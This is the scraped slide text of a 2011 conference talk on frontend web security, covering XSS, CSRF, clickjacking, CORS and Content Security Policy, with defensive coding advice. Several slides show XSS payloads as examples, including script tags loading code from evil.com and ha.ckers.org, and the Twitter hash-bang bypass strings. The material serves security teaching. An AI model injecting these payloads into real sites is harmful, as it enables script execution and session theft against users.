SlideShare a Scribd company logo
1 of 83
Web security in the frontend
Framsia
H2011 – Erlend Oftedal
Side 1
Who am I?
 Developer
 Head of the security competency group at BEKK
 Chapter lead of the OWASP Norway chapter
 Member of the Norwegian Honeynet project
 erlend.oftedal@bekk.no
 @webtonull
 http://erlend.oftedal.no/blog
Side 10
DEMO
HTML5 validation
?
Client side validation of data sent to server
 Improves usability
 Has nothing to do with security
Side 12
Cross Site Scripting - XSS
 One of the most common problems
 OWASP Top 10 2004, 2007, 2010
Side 13
http://info.veracode.com/rs/veracode/images/soss-v3.pdf
Cross site scripting
Drawing by @johnwilander
Reflected
Side 15Drawing by @johnwilander
Side 16
DEMO
Reflected XSS
Stored
Side 17Drawing by @johnwilander
Stored
Side 18Drawing by @johnwilander
Side 19
DEMO
Persistent/stored XSS
DOM-based
Side 20Drawing by @johnwilander
Side 21
DEMO
DOM based XSS
DOM-based
Side 22
 http://www.server.com/#banner=2011
 Would you click:
 http://server.com/#banner=2011<script src="http://evil.com/"></script>
 http://server.com/#banner=2011%3Cscript%20src%3D%22http%3A//evil.com/%22%3E%3C/script%
3E
 http://bit.ly/vH6d6w
Not sent to server
Example
 $(location.hash)
 $("#<script>alert(1)</script>")
 http://codesearch.google.com/codesearch?as_q=%22%24%28location.hash%29%22
http://ma.la/jquery_xss/
Twitter September 2010
(function(g) {
var a = location.href.split("#!")[1];
if(a){
g.location = a;
}
})(window);
Goal:
https://twitter.com/#!/framsia
https://twitter.com/framsia
Side 24
http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-and-something.html
Twitter September 2010
https://twitter.com/#!javascript:alert(1)
g.location = "javascript:alert(1)"
Side 25
Not sent to server
First attempt to patch
var c = location.href.split("#!")[1];
if(c) {
window.location = c.replace(":", "");
} else {
return true;
}
Side 26
Replaces first occurence of
the search string.
But...
https://twitter.com/#!javascript::alert(1)
Side 27
2nd attempt
(function(g){
var a = location.href.split("#!").[1];
if(a) {
g.location = a.replace(/:/gi, "");
}
})(window);
Side 28
But...
http://twitter.com/#!javascript&#58;alert(1)
Side 29
Working patch
(function(g){
var a = location.href.split("#!")[1];
if(a) {
g.location.pathname = a;
}
})(window);
Side 30
HTML5 - Browser Storage
 Persistent DOM based XSS
Is it really all that dangerous?
Side 32
Side 33
DEMO
BeEF
http://telenorsoc.blogspot.com/2008/10/malware-og-drive-by-exploits.html
How do we stop it?
Side 35
The same origin policy
<script>
<iframe src="http://mail.google.com">
</iframe>
Is input validation enough?
 How do you validate an email address?
 [a-z]+@[a-z]+.[a-z]{2,3}
 [a-z'-A-ZæøåÆØÅ.]+@[a-z0-9-.]+.[a-z]{2,3}
Side 37
From Wikipedia
 The local-part of the email address may use any of these ASCII characters
RFC 5322 Section 3.2.3:
– Uppercase and lowercase English letters (a–z, A–Z) (ASCII: 65-90, 97-122)
– Digits 0 to 9 (ASCII: 48-57)
– Characters !#$%&'*+-/=?^_`{|}~ (ASCII: 33, 35-39, 42, 43, 45, 47, 61, 63, 94-96, 123-126)
– Character . (dot, period, full stop) provided that it is not the first or last
character, and provided also that it does not appear two or more times
consecutively (e.g. John..Doe@example.com).
– Special characters are allowed with restrictions including:
– Space and "(),:;<>@[] (ASCII: 32, 34, 40, 41, 44, 58, 59, 60, 62, 64, 91-93)
From Wikipedia
 Valid email addresses
– niceandsimple@example.com
– a.little.unusual@example.com
– much."more unusual"@example.com
– very.unusual."@".unusual.com@example.com
– very."(),:;<>[]".VERY."very @"very".unusual@cool.example.com
Input validation is not enough!
 How would you avoid XSS on Stack Overflow?
 Do you really expect the user to write htmlentities like &gt; and &lt;?
– User friendly?
Side 40
Contextual encoding
 OWASP XSS Prevention cheat sheet
– Between HTML tags – html encoding &#nn;
– In HTML attributes – html attribute encoding &#nn;
– In javascript strings – javascript encoding xnn
– In CSS – CSS encoding nnnnnn
– In URLs - URL encoding %nn
Side 41
Contextual encoding is important!
Side 42
<html>
<body>
<script>
var a = "</script><script>alert(1)</script>";
</script>
</body>
</html>
Simple HTML encoding is not enough
Side 43
<img class="profile" src="http://..."
onmouseover="showUserProfile('bob&#39;); alert(&#39;1')">
Allowing some HTML tags?
 Use a well-tested whitelist based policy engine
– Specify allowed tags and allowed attributes
– Canonicalization
 Suggestions
– OWASP AntiSamy
– HtmlPurifier
Side 44
Why you do NOT write your own HTML-cleaner/sanitizer
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")>
<META HTTP-EQUIV="Set-Cookie"
Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">
¼script¾alert(¢XSS¢)¼/script¾
<charset="x-mac-farsi">☼script ☾alert(1)//☼/script ☾
http://ha.ckers.org/xss.html
jQuery Encoder
 $.encoder.canonicalize()
 $.encoder.encodeForCSS()
 $.encoder.encodeForHTML()
 $.encoder.encodeForHTMLAttribute()
 $.encoder.encodeForJavaScript()
 $.encoder.encodeForURL()
 http://github.com/chrisisbeef/jquery-encoder
Side 46
Avoiding DOM based XSS
 Beware of potential attacker controlled data
– window.name
– window.referer
– window.location.hash
– ++
Side 47
Coding principles
 JSON from XHR should be JSON encoded – no HTML encoding
 Beware of the semantics – jQuery:
 Use $("...").text(value) instead of $("...").html(value)
 Use .attr() to add attributes
 Use .css() to modify CSS
 URLencode before putting data in URLs (encodeURI() and friends)
 Never ever put user data inside:
– eval(string) – are you sure that's JSON and not just JS?
– setInterval(string, t)
– setTimeout(string, t)
– new Function(string)
Side 48
Coding principles
 If you are using a templating engine like Mustache, check:
– When is data escaped?
– How is it escaped?
– For what?
– Test it!
Side 49
Side 50
DEMO
DOMinator
CSRF
Side 51
 Cross Site Request Forgery
 One-click attack, session riding
Side 52
DEMO
CSRF demo (GET + POST)
CSRF - Overview
Side 53
1. Login
2. Load content
4. Pay bill to attacker’s account
Infected server
3. Page with hidden script
Bank
Stopping CSRF
Side 54
 Explicit verification before performing an action
– CAPTCHA
– Re-authentication
 One-time password before paying bills
CSRF – Token
Side 55
1. GET /pay
Infected server
Bank
2. 200 OK - <form...><input name="token" value="x123LKJ23"
3. POST /pay – token=x123LKJ23
4. 200 OK
For session x
Token=x123LKJ23
x123LKJ23
==
x123LKJ23
CSRF – Bad token
Side 56
0. Login
1. Load content
Infected server
2. Page with hidden script and form
<form...><input name="token" value="XYZZ..." >
Bank
3. POST /pay – token=XYZZ...
4. 400 Bad request
For session x
Token=9992812jabc
9992812jabc
!=
XYZZ...
Side 57
DEMO
CSRF Token protection demo
Cross Domain Data
Side 58
 Proxy
 JSONP
 CORS
Proxy
Side 59
 Client asks server
 Server asks target
 Target returns data to server
 Server returns data to client
 Allows server to inspect/reject data
 Does not circumvent the Same Origin
Policy
 Cannot directly reuse current
authentication
JSONP
Side 60
 Page from server A adds a script-tag to target server B
 Server B (hopefully) returns JSON data wrapped in a callback function:
callback({"id":0, ...})
 Page from server A defines a function with the same name as the
callback function, and receives the data
 Can leverage current authentication
 Any webpage can include the same script tag and the same callback and
thus potentially steal the data
 Server B can misbehave and send other types of javascript (XSS)
 No easy way to protect POST requests from CSRF
 => Insecurely circumventing the Same Origin Policy
CORS – Cross Origin Resource Sharing
Side 61
 Standards-defined secure way to do cross domain requests from the
browser
 Types:
– postMessage
– Cross Domain XHR
CORS - postMessage
Side 62
 Webpage from server A includes a (hidden) iframe to target server B
 JavaScript on page from A, invokes postMessage on iframe
iframe.contentWindow
.postMessage("some data", "http://serverB")
 Page in iframe from server B defines an event handler:
$(window).bind("message", function(e) {
var event = e.originalEvent;
if (event.origin == "http://serverA") {
//process event.data
}
});
CORS - postMessage
Side 63
 Remember to check origin of an event
 Don't be tempted to specify "*" as the second parameter to postMessage
Cross Domain XHR
Side 64
 $.getJSON("http://serverB/someService",
function(data) {
//handle data
});
 Server B returns the data with a specific response header:
Access-Control-Allow-Origin: http://serverA
 Once again do not use * as server name unless you want the data to be
available to server
Side 65
DEMO
CORS DEMO (XHR + postMessage)
Important regardless of choice
Side 66
 Agree on type of encodig – prefer JSON with no other encoding
 Remember – if you allow HTML, you open for XSS
Side 67
DEMO
Video of XSS via twitter feed
Clickjacking
Side 68
 User does not click on what he/she thinks
 Hidden iframe
 Like-jacking
Side 69
DEMO
Clickjacking demo
Side 70
http://amolnaik4.blogspot.com/2011/09/hijacking-2-clicks-in-google-accounts.html
Advanced clickjacking
Side 71
 Exploiting drag-n-drop to steal content
 User drags a ball into a basket
– In reality selects text and drops it in a textarea
Anti-clickjacking
Side 72
 Javascript framebusting
 Response header
X-Frame-Options: sameorigin
X-Frame-Options: deny
 Javascript framebusting can be circumvented
 X-Frame-Options is only supported in newer browsers
– IE8 was the first one
– IE also supports X-Frame-Options: allow-from <domains>
Side 73
DEMO
Anti-clicjacking via X-Frame-Options
EcmaScript 5 – defineProperty
Side 74
 Object.defineProperty(object, propertyName, {
get: function() { ... },
set: function(value) { ... },
configurable: boolean
})
Side 75
DEMO
Blocking calls to document.cookie from JS
HTML5 – SVG
http://www.owasp.org/images/a/aa/The_image_that_called_me.pdf
 Scalable Vector Graphics
– Image format
– Allows for scripting
– XML-based
– Can be declared inline
– <html>...<div>...<svg>...
 Countless XSS bugs in browser implementations
SVG favicon
 SVG favicon overlaying the chrome of Opera
Side 77
Picture by Mario Heiderich @0x6D6172696F
Content Security Policy
Mozilla CSP - Content Security Policy
• Now a W3C standard
• header based - server instructs browser
• policies for javascript, frames, images, style etc.
X-Content-Security-Policy: allow *; script-src 'self‘
X-Content-Security-Policy: allow *; script-src 'self' *.google.com https://*.nordea.no:443
X-Content-Security-Policy: allow *; script-src 'self'; options inline-script eval-script
https://wiki.mozilla.org/Security/CSP/Spec
Content Security Policy
 First version came in Firefox 4
– FF7 and FF8beta ~80% compliant with current W3C spec
 Implemented in Chrome
– Completely broken in Chrome 15 – ~95% compliant in beta (16)
 By default disables javascript functions that build code from strings
eval(s), setTimeout(s,t), setInterval(s,t), new Function(s)
 Can (in the future) be used for clickjacking-defence:
frame-ancestors uri
Side 79
Side 80
DEMO
Content Security Policy demo
Other HTML5 features
Side 81
 Check html5sec.org
 Test tool http://html5sec.org/innerhtml
Recommended books
Side 82
Questions
Erlend Oftedal
erlend.oftedal@bekk.no
@webtonull
 People you should follow
@0x6D6172696F – HTML5 security
@johnwilander – RIA security
@wisecwisec – DOM based XSS
@garethheyes - XSS
@kkotowicz - Clickjacking

More Related Content

What's hot

[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Javascript Security
Javascript SecurityJavascript Security
Javascript Securityjgrahamc
 
Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Jeremiah Grossman
 
VSA: The Virtual Scripted Attacker, Brucon 2012
VSA: The Virtual Scripted Attacker, Brucon 2012VSA: The Virtual Scripted Attacker, Brucon 2012
VSA: The Virtual Scripted Attacker, Brucon 2012Abraham Aranguren
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsSimon Willison
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
XSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareXSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareOmer Meshar
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupAdam Caudill
 
Breaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandboxBreaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandboxMathias Karlsson
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingkinish kumar
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 
Dom based xss
Dom based xssDom based xss
Dom based xssLê Giáp
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)OWASP Khartoum
 
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStoragetomasperezv
 
Securing your AngularJS Application
Securing your AngularJS ApplicationSecuring your AngularJS Application
Securing your AngularJS ApplicationPhilippe De Ryck
 

What's hot (20)

[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
Javascript Security
Javascript SecurityJavascript Security
Javascript Security
 
Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)
 
VSA: The Virtual Scripted Attacker, Brucon 2012
VSA: The Virtual Scripted Attacker, Brucon 2012VSA: The Virtual Scripted Attacker, Brucon 2012
VSA: The Virtual Scripted Attacker, Brucon 2012
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentals
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
Xss talk, attack and defense
Xss talk, attack and defenseXss talk, attack and defense
Xss talk, attack and defense
 
XSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareXSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malware
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers Group
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
 
Breaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandboxBreaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandbox
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )
 
Dom based xss
Dom based xssDom based xss
Dom based xss
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
 
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorage
 
Securing your AngularJS Application
Securing your AngularJS ApplicationSecuring your AngularJS Application
Securing your AngularJS Application
 

Viewers also liked

Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APIKevin Hakanson
 
(Не)безопасный frontend
(Не)безопасный frontend(Не)безопасный frontend
(Не)безопасный frontendSergey Belov
 
Юзабилити и функциональность ДБО2017
Юзабилити и функциональность ДБО2017Юзабилити и функциональность ДБО2017
Юзабилити и функциональность ДБО2017Дмитрий Силаев
 
UX STRAT USA: Jon Ashley and Matt Wakeman, "Decision-Making Frameworks for Om...
UX STRAT USA: Jon Ashley and Matt Wakeman, "Decision-Making Frameworks for Om...UX STRAT USA: Jon Ashley and Matt Wakeman, "Decision-Making Frameworks for Om...
UX STRAT USA: Jon Ashley and Matt Wakeman, "Decision-Making Frameworks for Om...UX STRAT
 
UX STRAT USA: Shikha Desai, "Using Design Jams to Guide Microsoft's Office Su...
UX STRAT USA: Shikha Desai, "Using Design Jams to Guide Microsoft's Office Su...UX STRAT USA: Shikha Desai, "Using Design Jams to Guide Microsoft's Office Su...
UX STRAT USA: Shikha Desai, "Using Design Jams to Guide Microsoft's Office Su...UX STRAT
 
UX STRAT Europe, Michael Thompson, “Bridging the UX-Business Gap: A Framework...
UX STRAT Europe, Michael Thompson, “Bridging the UX-Business Gap: A Framework...UX STRAT Europe, Michael Thompson, “Bridging the UX-Business Gap: A Framework...
UX STRAT Europe, Michael Thompson, “Bridging the UX-Business Gap: A Framework...UX STRAT
 
UX STRAT Europe, Michel Jansen, “Using UX Strategy to Move Aegon Toward Custo...
UX STRAT Europe, Michel Jansen, “Using UX Strategy to Move Aegon Toward Custo...UX STRAT Europe, Michel Jansen, “Using UX Strategy to Move Aegon Toward Custo...
UX STRAT Europe, Michel Jansen, “Using UX Strategy to Move Aegon Toward Custo...UX STRAT
 
UX STRAT Europe, Kees Moens, “Haarlem Oil: UX Strategy at ING”
UX STRAT Europe, Kees Moens, “Haarlem Oil: UX Strategy at ING”UX STRAT Europe, Kees Moens, “Haarlem Oil: UX Strategy at ING”
UX STRAT Europe, Kees Moens, “Haarlem Oil: UX Strategy at ING”UX STRAT
 
UX STRAT USA: Beverly May, "Moving Your Team From Good To Great UX"
UX STRAT USA: Beverly May, "Moving Your Team From Good To Great UX"UX STRAT USA: Beverly May, "Moving Your Team From Good To Great UX"
UX STRAT USA: Beverly May, "Moving Your Team From Good To Great UX"UX STRAT
 
UX STRAT USA: Ben Judy, "Mission-Based UX Strategy: One Year Later"
UX STRAT USA: Ben Judy, "Mission-Based UX Strategy: One Year Later"UX STRAT USA: Ben Judy, "Mission-Based UX Strategy: One Year Later"
UX STRAT USA: Ben Judy, "Mission-Based UX Strategy: One Year Later"UX STRAT
 
UX STRAT USA: Dr Jeffrey Onken, "Experience Mapping UX Change Management In L...
UX STRAT USA: Dr Jeffrey Onken, "Experience Mapping UX Change Management In L...UX STRAT USA: Dr Jeffrey Onken, "Experience Mapping UX Change Management In L...
UX STRAT USA: Dr Jeffrey Onken, "Experience Mapping UX Change Management In L...UX STRAT
 
UX STRAT USA: Ha Phan, "Using Design Experiments as a Springboard for Strategy"
UX STRAT USA: Ha Phan, "Using Design Experiments as a Springboard for Strategy"UX STRAT USA: Ha Phan, "Using Design Experiments as a Springboard for Strategy"
UX STRAT USA: Ha Phan, "Using Design Experiments as a Springboard for Strategy"UX STRAT
 
UX STRAT USA 2016 Workshop: Jim Kalbach, "Mapping Experiences"
UX STRAT USA 2016 Workshop: Jim Kalbach, "Mapping Experiences"UX STRAT USA 2016 Workshop: Jim Kalbach, "Mapping Experiences"
UX STRAT USA 2016 Workshop: Jim Kalbach, "Mapping Experiences"UX STRAT
 
Speaking up for Experiences
Speaking up for ExperiencesSpeaking up for Experiences
Speaking up for ExperiencesStephen Anderson
 

Viewers also liked (15)

Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography API
 
(Не)безопасный frontend
(Не)безопасный frontend(Не)безопасный frontend
(Не)безопасный frontend
 
How to Lean
How to LeanHow to Lean
How to Lean
 
Юзабилити и функциональность ДБО2017
Юзабилити и функциональность ДБО2017Юзабилити и функциональность ДБО2017
Юзабилити и функциональность ДБО2017
 
UX STRAT USA: Jon Ashley and Matt Wakeman, "Decision-Making Frameworks for Om...
UX STRAT USA: Jon Ashley and Matt Wakeman, "Decision-Making Frameworks for Om...UX STRAT USA: Jon Ashley and Matt Wakeman, "Decision-Making Frameworks for Om...
UX STRAT USA: Jon Ashley and Matt Wakeman, "Decision-Making Frameworks for Om...
 
UX STRAT USA: Shikha Desai, "Using Design Jams to Guide Microsoft's Office Su...
UX STRAT USA: Shikha Desai, "Using Design Jams to Guide Microsoft's Office Su...UX STRAT USA: Shikha Desai, "Using Design Jams to Guide Microsoft's Office Su...
UX STRAT USA: Shikha Desai, "Using Design Jams to Guide Microsoft's Office Su...
 
UX STRAT Europe, Michael Thompson, “Bridging the UX-Business Gap: A Framework...
UX STRAT Europe, Michael Thompson, “Bridging the UX-Business Gap: A Framework...UX STRAT Europe, Michael Thompson, “Bridging the UX-Business Gap: A Framework...
UX STRAT Europe, Michael Thompson, “Bridging the UX-Business Gap: A Framework...
 
UX STRAT Europe, Michel Jansen, “Using UX Strategy to Move Aegon Toward Custo...
UX STRAT Europe, Michel Jansen, “Using UX Strategy to Move Aegon Toward Custo...UX STRAT Europe, Michel Jansen, “Using UX Strategy to Move Aegon Toward Custo...
UX STRAT Europe, Michel Jansen, “Using UX Strategy to Move Aegon Toward Custo...
 
UX STRAT Europe, Kees Moens, “Haarlem Oil: UX Strategy at ING”
UX STRAT Europe, Kees Moens, “Haarlem Oil: UX Strategy at ING”UX STRAT Europe, Kees Moens, “Haarlem Oil: UX Strategy at ING”
UX STRAT Europe, Kees Moens, “Haarlem Oil: UX Strategy at ING”
 
UX STRAT USA: Beverly May, "Moving Your Team From Good To Great UX"
UX STRAT USA: Beverly May, "Moving Your Team From Good To Great UX"UX STRAT USA: Beverly May, "Moving Your Team From Good To Great UX"
UX STRAT USA: Beverly May, "Moving Your Team From Good To Great UX"
 
UX STRAT USA: Ben Judy, "Mission-Based UX Strategy: One Year Later"
UX STRAT USA: Ben Judy, "Mission-Based UX Strategy: One Year Later"UX STRAT USA: Ben Judy, "Mission-Based UX Strategy: One Year Later"
UX STRAT USA: Ben Judy, "Mission-Based UX Strategy: One Year Later"
 
UX STRAT USA: Dr Jeffrey Onken, "Experience Mapping UX Change Management In L...
UX STRAT USA: Dr Jeffrey Onken, "Experience Mapping UX Change Management In L...UX STRAT USA: Dr Jeffrey Onken, "Experience Mapping UX Change Management In L...
UX STRAT USA: Dr Jeffrey Onken, "Experience Mapping UX Change Management In L...
 
UX STRAT USA: Ha Phan, "Using Design Experiments as a Springboard for Strategy"
UX STRAT USA: Ha Phan, "Using Design Experiments as a Springboard for Strategy"UX STRAT USA: Ha Phan, "Using Design Experiments as a Springboard for Strategy"
UX STRAT USA: Ha Phan, "Using Design Experiments as a Springboard for Strategy"
 
UX STRAT USA 2016 Workshop: Jim Kalbach, "Mapping Experiences"
UX STRAT USA 2016 Workshop: Jim Kalbach, "Mapping Experiences"UX STRAT USA 2016 Workshop: Jim Kalbach, "Mapping Experiences"
UX STRAT USA 2016 Workshop: Jim Kalbach, "Mapping Experiences"
 
Speaking up for Experiences
Speaking up for ExperiencesSpeaking up for Experiences
Speaking up for Experiences
 

Similar to Web Application Security in front end

Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
15 owasp top 10 - a3-xss
15   owasp top 10 - a3-xss15   owasp top 10 - a3-xss
15 owasp top 10 - a3-xssappsec
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Application Security for RIAs
Application Security for RIAsApplication Security for RIAs
Application Security for RIAsjohnwilander
 
xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfyashvirsingh48
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterMichael Coates
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web SecurityChris Shiflett
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Java EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank KimJava EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank Kimjaxconf
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011Samvel Gevorgyan
 
Secure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scriptingSecure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scriptingSecure Code Warrior
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooNahidul Kibria
 
Pantallas escaneo Sitio Web
Pantallas escaneo Sitio WebPantallas escaneo Sitio Web
Pantallas escaneo Sitio Webandres1422
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 

Similar to Web Application Security in front end (20)

4.Xss
4.Xss4.Xss
4.Xss
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthrough
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
15 owasp top 10 - a3-xss
15   owasp top 10 - a3-xss15   owasp top 10 - a3-xss
15 owasp top 10 - a3-xss
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Application Security for RIAs
Application Security for RIAsApplication Security for RIAs
Application Security for RIAs
 
xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdf
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Web Security
Web SecurityWeb Security
Web Security
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Java EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank KimJava EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank Kim
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
Secure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scriptingSecure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scripting
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs too
 
Pantallas escaneo Sitio Web
Pantallas escaneo Sitio WebPantallas escaneo Sitio Web
Pantallas escaneo Sitio Web
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 

Recently uploaded

AI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří KarpíšekAI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří KarpíšekCzechDreamin
 
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya HalderCustom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
